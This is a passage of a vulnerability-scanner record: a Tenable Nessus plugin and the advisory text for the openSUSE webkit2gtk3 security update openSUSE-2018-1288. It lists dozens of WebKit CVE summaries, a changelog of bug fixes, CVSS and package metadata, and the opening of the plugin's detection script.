that triggers a WebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n\n - CVE-2018-4204: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1092279).\n\n - CVE-2018-4101: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4113: An issue in the JavaScriptCore function in the 'WebKit' component allowed attackers to trigger an assertion failure by leveraging improper array indexing (bsc#1088182)\n\n - CVE-2018-4114: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182) \n\n - CVE-2018-4117: An unspecified issue allowed remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted website (bsc#1088182, bsc#1102530).\n\n - CVE-2018-4118: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182) \n\n - CVE-2018-4119: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182) \n\n - CVE-2018-4120: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4121: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1092278).\n\n - CVE-2018-4122: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4125: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4127: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4128: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4129: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4146: An unspecified issue allowed attackers to cause a denial of service (memory corruption) via a crafted website (bsc#1088182).\n\n - CVE-2018-4161: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4162: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4163: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4165: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain sensitive credential information that is transmitted during a CSS mask-image fetch (bsc#1097693)\n\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers an @generatorState use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote attackers to overwrite cookies via a crafted website (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1097693) \n\n - CVE-2018-4246: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages type confusion (bsc#1104169) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL mishandled an unset pageURL, leading to an application crash (bsc#1095611)\n\n - CVE-2018-4133: A Safari cross-site scripting (XSS) vulnerability allowed remote attackers to inject arbitrary web script or HTML via a crafted URL (bsc#1088182).\n\n - CVE-2018-11713: The libsoup network backend of WebKit unexpectedly failed to use system proxy settings for WebSocket connections. As a result, users could be deanonymized by crafted websites via a WebSocket connection (bsc#1096060).\n\n - CVE-2018-11712: The libsoup network backend of WebKit failed to perform TLS certificate verification for WebSocket connections (bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues :\n\n - Fixed a crash when atk_object_ref_state_set is called on an AtkObject that's being destroyed (bsc#1088932).\n\n - Fixed crash when using Wayland with QXL/virtio (bsc#1079512)\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies of about:blank page.\n\n - Fix UI process crash when closing the window under Wayland.\n\n - Fix several crashes and rendering issues.\n\n - Do TLS error checking on GTlsConnection::accept-certificate to finish the load earlier in case of errors.\n\n - Properly close the connection to the nested wayland compositor in the Web Process.\n\n - Avoid painting backing stores for zero-opacity layers.\n\n - Fix downloads started by context menu failing in some websites due to missing user agent HTTP header.\n\n - Fix video unpause when GStreamerGL is disabled.\n\n - Fix several GObject introspection annotations.\n\n - Update user agent quiks to fix Outlook.com and Chase.com.\n\n - Fix several crashes and rendering issues.\n\n - Improve error message when Gigacage cannot allocate virtual memory.\n\n - Add missing WebKitWebProcessEnumTypes.h to webkit-web-extension.h.\n\n - Improve web process memory monitor thresholds.\n\n - Fix a web process crash when the web view is created and destroyed quickly.\n\n - Fix a network process crash when load is cancelled while searching for stored HTTP auth credentials.\n\n - Fix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and ENABLE_XSLT are disabled.\n\n - New API to retrieve and delete cookies with WebKitCookieManager.\n\n - New web process API to detect when form is submitted via JavaScript.\n\n - Several improvements and fixes in the touch/gestures support.\n\n - Support for the “system” CSS font family.\n\n - Complex text rendering improvements and fixes.\n\n - More complete and spec compliant WebDriver implementation.\n\n - Ensure DNS prefetching cannot be re-enabled if disabled by settings.\n\n - Fix seek sometimes not working.\n\n - Fix rendering of emojis that were using the wrong scale factor in some cases.\n\n - Fix rendering of combining enclosed keycap.\n\n - Fix rendering scale of some layers in HiDPI.\n\n - Fix a crash in Wayland when closing the web view.\n\n - Fix crashes upower crashes when running inside a chroot or on systems with broken dbus/upower.\n\n - Fix memory leaks in GStreamer media backend when using GStreamer 1.14.\n\n - Fix several crashes and rendering issues.\n\n - Add ENABLE_ADDRESS_SANITIZER to make it easier to build with asan support.\n\n - Fix a crash a under Wayland when using mesa software rasterization.\n\n - Make fullscreen video work again.\n\n - Fix handling of missing GStreamer elements.\n\n - Fix rendering when webm video is played twice.\n\n - Fix kinetic scrolling sometimes jumping around.\n\n - Fix build with ICU configured without collation support.\n\n - WebSockets use system proxy settings now (requires libsoup 2.61.90).\n\n - Show the context menu on long-press gesture.\n\n - Add support for Shift + mouse scroll to scroll horizontally.\n\n - Fix zoom gesture to actually zoom instead of changing the page scale.\n\n - Implement support for Graphics ARIA roles.\n\n - Make sleep inhibitors work under Flatpak.\n\n - Add get element CSS value command to WebDriver.\n\n - Fix a crash aftter a swipe gesture.\n\n - Fix several crashes and rendering issues.\n\n - Fix crashes due to duplicated symbols in libjavascriptcoregtk and libwebkit2gtk.\n\n - Fix parsing of timeout values in WebDriver.\n\n - Implement get timeouts command in WebDriver.\n\n - Fix deadlock in GStreamer video sink during shutdown when accelerated compositing is disabled.\n\n - Fix several crashes and rendering issues.\n\n - Add web process API to detect when form is submitted via JavaScript.\n\n - Add new API to replace webkit_form_submission_request_get_text_fields() that is now deprecated.\n\n - Add WebKitWebView::web-process-terminated signal and deprecate web-process-crashed.\n\n - Fix rendering issues when editing text areas.\n\n - Use FastMalloc based GstAllocator for GStreamer.\n\n - Fix web process crash at startup in bmalloc.\n\n - Fix several memory leaks in GStreamer media backend.\n\n - WebKitWebDriver process no longer links to libjavascriptcoregtk.\n\n - Fix several crashes and rendering issues.\n\n - Add new API to add, retrieve and delete cookies via WebKitCookieManager.\n\n - Add functions to WebSettings to convert font sizes between points and pixels.\n\n - Ensure cookie operations take effect when they happen before a web process has been spawned.\n\n - Automatically adjust font size when GtkSettings:gtk-xft-dpi changes.\n\n - Add initial resource load statistics support.\n\n - Add API to expose availability of certain editing commands in WebKitEditorState.\n\n - Add API to query whether a WebKitNavigationAction is a redirect or not.\n\n - Improve complex text rendering.\n\n - Add support for the 'system' CSS font family.\n\n - Disable USE_GSTREAMER_GL\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-26T00:00:00", "type": "nessus", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2018-1288)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-11646", "CVE-2018-11712", "CVE-2018-11713", "CVE-2018-12911", "CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4133", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4200", "CVE-2018-4204", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-1288.NASL", "href": "https://www.tenable.com/plugins/nessus/118453", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1288.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118453);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-11646\", \"CVE-2018-11712\", \"CVE-2018-11713\", \"CVE-2018-12911\", \"CVE-2018-4088\", \"CVE-2018-4096\", \"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4121\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4200\", \"CVE-2018-4204\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2018-1288)\");\n script_summary(english:\"Check for the openSUSE-2018-1288 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-12911: Fixed an off-by-one error in\n xdg_mime_get_simple_globs (boo#1101999)\n\n - CVE-2017-13884: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-13885: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-7153: An unspecified issue allowed remote\n attackers to spoof user-interface information (about\n whether the entire content is derived from a valid TLS\n session) via a crafted website that sends a 401\n Unauthorized redirect (bsc#1077535).\n\n - CVE-2017-7160: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-7161: An unspecified issue allowed remote\n attackers to execute arbitrary code via special\n characters that trigger command injection (bsc#1075775,\n bsc#1077535).\n\n - CVE-2017-7165: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4088: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4096: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4200: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers a\n WebCore::jsElementScrollHeightGetter use-after-free\n (bsc#1092280).\n\n - CVE-2018-4204: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1092279).\n\n - CVE-2018-4101: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4113: An issue in the JavaScriptCore function\n in the 'WebKit' component allowed attackers to trigger\n an assertion failure by leveraging improper array\n indexing (bsc#1088182)\n\n - CVE-2018-4114: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4117: An unspecified issue allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1088182, bsc#1102530).\n\n - CVE-2018-4118: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4119: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4120: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4121: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1092278).\n\n - CVE-2018-4122: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4125: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4127: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4128: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4129: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4146: An unspecified issue allowed attackers to\n cause a denial of service (memory corruption) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4161: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4162: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4163: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4165: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693)\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4246: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages type confusion (bsc#1104169) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandled\n an unset pageURL, leading to an application crash\n (bsc#1095611)\n\n - CVE-2018-4133: A Safari cross-site scripting (XSS)\n vulnerability allowed remote attackers to inject\n arbitrary web script or HTML via a crafted URL\n (bsc#1088182).\n\n - CVE-2018-11713: The libsoup network backend of WebKit\n unexpectedly failed to use system proxy settings for\n WebSocket connections. As a result, users could be\n deanonymized by crafted websites via a WebSocket\n connection (bsc#1096060).\n\n - CVE-2018-11712: The libsoup network backend of WebKit\n failed to perform TLS certificate verification for\n WebSocket connections (bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues :\n\n - Fixed a crash when atk_object_ref_state_set is called on\n an AtkObject that's being destroyed (bsc#1088932).\n\n - Fixed crash when using Wayland with QXL/virtio\n (bsc#1079512)\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\n - Do TLS error checking on\n GTlsConnection::accept-certificate to finish the load\n earlier in case of errors.\n\n - Properly close the connection to the nested wayland\n compositor in the Web Process.\n\n - Avoid painting backing stores for zero-opacity layers.\n\n - Fix downloads started by context menu failing in some\n websites due to missing user agent HTTP header.\n\n - Fix video unpause when GStreamerGL is disabled.\n\n - Fix several GObject introspection annotations.\n\n - Update user agent quiks to fix Outlook.com and\n Chase.com.\n\n - Fix several crashes and rendering issues.\n\n - Improve error message when Gigacage cannot allocate\n virtual memory.\n\n - Add missing WebKitWebProcessEnumTypes.h to\n webkit-web-extension.h.\n\n - Improve web process memory monitor thresholds.\n\n - Fix a web process crash when the web view is created and\n destroyed quickly.\n\n - Fix a network process crash when load is cancelled while\n searching for stored HTTP auth credentials.\n\n - Fix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and\n ENABLE_XSLT are disabled.\n\n - New API to retrieve and delete cookies with\n WebKitCookieManager.\n\n - New web process API to detect when form is submitted via\n JavaScript.\n\n - Several improvements and fixes in the touch/gestures\n support.\n\n - Support for the “system” CSS font family.\n\n - Complex text rendering improvements and fixes.\n\n - More complete and spec compliant WebDriver\n implementation.\n\n - Ensure DNS prefetching cannot be re-enabled if disabled\n by settings.\n\n - Fix seek sometimes not working.\n\n - Fix rendering of emojis that were using the wrong scale\n factor in some cases.\n\n - Fix rendering of combining enclosed keycap.\n\n - Fix rendering scale of some layers in HiDPI.\n\n - Fix a crash in Wayland when closing the web view.\n\n - Fix crashes upower crashes when running inside a chroot\n or on systems with broken dbus/upower.\n\n - Fix memory leaks in GStreamer media backend when using\n GStreamer 1.14.\n\n - Fix several crashes and rendering issues.\n\n - Add ENABLE_ADDRESS_SANITIZER to make it easier to build\n with asan support.\n\n - Fix a crash a under Wayland when using mesa software\n rasterization.\n\n - Make fullscreen video work again.\n\n - Fix handling of missing GStreamer elements.\n\n - Fix rendering when webm video is played twice.\n\n - Fix kinetic scrolling sometimes jumping around.\n\n - Fix build with ICU configured without collation support.\n\n - WebSockets use system proxy settings now (requires\n libsoup 2.61.90).\n\n - Show the context menu on long-press gesture.\n\n - Add support for Shift + mouse scroll to scroll\n horizontally.\n\n - Fix zoom gesture to actually zoom instead of changing\n the page scale.\n\n - Implement support for Graphics ARIA roles.\n\n - Make sleep inhibitors work under Flatpak.\n\n - Add get element CSS value command to WebDriver.\n\n - Fix a crash aftter a swipe gesture.\n\n - Fix several crashes and rendering issues.\n\n - Fix crashes due to duplicated symbols in\n libjavascriptcoregtk and libwebkit2gtk.\n\n - Fix parsing of timeout values in WebDriver.\n\n - Implement get timeouts command in WebDriver.\n\n - Fix deadlock in GStreamer video sink during shutdown\n when accelerated compositing is disabled.\n\n - Fix several crashes and rendering issues.\n\n - Add web process API to detect when form is submitted via\n JavaScript.\n\n - Add new API to replace\n webkit_form_submission_request_get_text_fields() that is\n now deprecated.\n\n - Add WebKitWebView::web-process-terminated signal and\n deprecate web-process-crashed.\n\n - Fix rendering issues when editing text areas.\n\n - Use FastMalloc based GstAllocator for GStreamer.\n\n - Fix web process crash at startup in bmalloc.\n\n - Fix several memory leaks in GStreamer media backend.\n\n - WebKitWebDriver process no longer links to\n libjavascriptcoregtk.\n\n - Fix several crashes and rendering issues.\n\n - Add new API to add, retrieve and delete cookies via\n WebKitCookieManager.\n\n - Add functions to WebSettings to convert font sizes\n between points and pixels.\n\n - Ensure cookie operations take effect when they happen\n before a web process has been spawned.\n\n - Automatically adjust font size when\n GtkSettings:gtk-xft-dpi changes.\n\n - Add initial resource load statistics support.\n\n - Add API to expose availability of certain editing\n commands in WebKitEditorState.\n\n - Add API to query whether a WebKitNavigationAction is a\n redirect or not.\n\n - Improve complex text rendering.\n\n - Add support for the 'system' CSS font family.\n\n - Disable USE_GSTREAMER_GL\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1075775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1077535\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1079512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1088182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1088932\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092280\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1096060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1096061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1101999\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102530\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1104169\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 